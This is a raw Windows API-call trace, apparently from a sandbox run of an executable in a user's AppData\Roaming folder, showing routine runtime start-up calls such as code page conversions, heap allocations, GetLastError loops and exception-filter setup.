SetLastError (dwErrCode=0x0) [0165.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0165.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0165.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ朚딆\䃚) returned 256 [0165.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ朚딆\䃚, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0165.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ朚딆\䃚, cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0165.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x10#\x7fi\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0165.553] GetLastError () returned 0x0 [0165.553] SetLastError (dwErrCode=0x0) [0165.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0165.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ朚딆\䃚) returned 256 [0165.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ朚딆\䃚, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0165.553] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ朚딆\䃚, cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0165.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x10#\x7fi\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0165.554] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x439300, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.554] GetLastError () returned 0x0 [0165.554] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.555] SetLastError (dwErrCode=0x0) [0165.555] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.556] SetLastError (dwErrCode=0x0) [0165.556] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x0, Size=0x33) returned 0x20e19b0 [0165.557] GetLastError () returned 0x0 [0165.557] SetLastError (dwErrCode=0x0) [0165.557] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.558] GetLastError () returned 0x0 [0165.558] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.559] SetLastError (dwErrCode=0x0) [0165.559] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.560] SetLastError (dwErrCode=0x0) [0165.560] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] GetLastError () returned 0x0 [0165.561] SetLastError (dwErrCode=0x0) [0165.561] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x98) returned 0x20e19f0 [0165.561] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1f) returned 0x20e1a90 [0165.561] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x2b) returned 0x20e1ab8 [0165.561] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x37) returned 0x20e1af0 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x3c) returned 0x20e1b30 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x31) returned 0x20e1b78 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x18) returned 0x20e1bb8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x24) returned 0x20e1bd8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x14) returned 0x20e1c08 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0xd) returned 0x20e1c28 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1a) returned 0x20e1c40 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x2e) returned 0x20e1c68 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x19) returned 0x20e1ca0 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x17) returned 0x20e1cc8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0xe) returned 0x20e1ce8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x95) returned 0x20e1d00 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x3e) returned 0x20e1da0 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1b) returned 0x20e1de8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1d) returned 0x20e1e10 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x48) returned 0x20e1e38 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x12) returned 0x20e1e88 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x18) returned 0x20e1ea8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1b) returned 0x20e1ec8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x24) returned 0x20e1ef0 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x29) returned 0x20e1f20 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1e) returned 0x20e1f58 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x69) returned 0x20e1f80 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x17) returned 0x20e1ff8 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0xf) returned 0x20e2018 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x16) returned 0x20e2030 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x2a) returned 0x20e2050 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x29) returned 0x20e2088 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x16) returned 0x20e20c0 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x13) returned 0x20e20e0 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x1f) returned 0x20e2100 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x12) returned 0x20e2128 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x18) returned 0x20e2148 [0165.562] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x46) returned 0x20e2168 [0165.573] HeapFree (in: hHeap=0x20e0000, dwFlags=0x0, lpMem=0x20e11f8 | out: hHeap=0x20e0000) returned 1 [0165.573] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x769b0000 [0165.573] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0165.573] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0165.575] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x800) returned 0x20e21b8 [0165.575] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x80) returned 0x20e11f8 [0165.575] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4080d0) returned 0x0 [0165.576] RtlSizeHeap (HeapHandle=0x20e0000, Flags=0x0, MemoryPointer=0x20e11f8) returned 0x80 [0165.576] GetLastError () returned 0x0 [0165.576] SetLastError (dwErrCode=0x0) [0165.576] GetLastError () returned 0x0 [0165.576] SetLastError (dwErrCode=0x0) [0165.576] GetLastError () returned 0x0 [0165.576] SetLastError (dwErrCode=0x0) [0165.576] GetLastError () returned 0x0 [0165.576] SetLastError (dwErrCode=0x0) [0165.576] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.577] GetLastError () returned 0x0 [0165.577] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.578] SetLastError (dwErrCode=0x0) [0165.578] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 0x0 [0165.579] SetLastError (dwErrCode=0x0) [0165.579] GetLastError () returned 